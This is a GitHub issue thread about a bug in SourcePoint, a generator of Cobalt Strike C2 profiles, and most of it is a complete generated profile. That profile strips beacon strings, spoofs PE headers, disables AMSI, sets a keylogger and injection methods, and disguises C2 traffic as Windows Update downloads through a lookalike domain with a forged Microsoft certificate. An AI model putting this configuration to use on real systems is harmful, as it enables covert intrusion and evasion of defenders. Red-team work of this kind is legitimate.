Staging Disabled In Profile
monpolo opened this issue · 3 comments
This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.
Generating Profile:
┌──(kali㉿kali)-[~/Desktop/SourcePoint-main]
└─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome
_____ ____ _ __
/ ___/____ __ _______________ / __ \____ (_)___ / /_
\__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
___/ / /_/ / /_/ / / / /__/ __/ ____/ /_/ / / / / / /_
/____/\____/\__,_/_/ \___/\___/_/ \____/_/_/ /_/\__/
(@Tyl0us)
[] Preparing Varibles...
[] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[] Post-Ex Process Name: gpupdate.exe
[] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking
Starting CS says
┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike]
└─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. ./teststage2.profile loaded.
[] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop).
[!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found.
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:50050
[*] SHA256 hash of SSL cert is:
Output from teststage2.profile
set host_stage "True";
set sleeptime "44000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";
set data_jitter "50";
set smb_frame_header "";
set pipename "plugplay+3850";
set pipename_stager "plugplay+1395";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "plugplay+##";
####Manaully add these if your doing C2 over DNS (Future Release)####
##dns-beacon {
set dns_idle "1.2.3.4";
set dns_max_txt "199";
set dns_sleep "1";
set dns_ttl "5";
set maxdns "200";
set dns_stager_prepend "doc-stg-prepend";
set dns_stager_subhost "doc-stg-sh.";
set beacon "doc.bc.";
set get_A "doc.1a.";
set get_AAAA "doc.4a.";
set get_TXT "doc.tx.";
set put_metadata "doc.md.";
set put_output "doc.po.";
set ns_response "zero";
#}
stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";
#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";
set checksum "0";
set compile_time "05 Jun 2028 09:16:06";
set entry_point "229200";
set image_size_x86 "397312";
set image_size_x64 "397312";
set name "Windows.System.Diagnostics.dll";
set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";
transform-x86 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
transform-x64 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "beacon.x64.dll" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
}
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";
# shape the content and properties of what we will inject
set min_alloc "9457";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
transform-x64 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
# specify how we execute code in the remote process
execute {
CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
NtQueueApcThread-s;
SetThreadContext;
CreateRemoteThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\syswow64\gpupdate.exe";
set spawnto_x64 "%windir%\sysnative\gpupdate.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# control the method used to log keystrokes
set keylogger "SetWindowsHookEx";
}
http-get {
set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";
client {
header "Accept" "*/*";
header "Host" "0012eb.lwindowsupdate.com";
metadata {
base64url;
append ".cab";
uri-append;
}
}
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
output {
print;
}
}
}
http-post {
set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";
set verb "GET";
client {
header "Accept" "*/*";
id {
prepend "download.windowsupdate.com/c/";
header "Host";
}
output {
base64url;
append ".cab";
uri-append;
}
}
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
output {
print;
}
}
}
http-stager {
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
}
}
https-certificate {
set CN "0012eb.lwindowsupdate.com"; #Common Name
set O "Microsoft Corporation"; #Organization Name
set C "US"; #Country
set L "Redmond"; #Locality
set OU "Microsoft IT"; #Organizational Unit Name
set ST "WA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
Tinkered around a bit, if I comment out the first line so it's
#set host_stage "True";
It works just fine now. Again, could very well be a silly mistake on my part but from how I'm interpreting your readme it seems this is unexpected behavior.
Looks like it's a case-sensitivity issue. I will update it tonight and close this ticket once the new version is pushed. Thank you for letting me know.
Fixed in version 1.2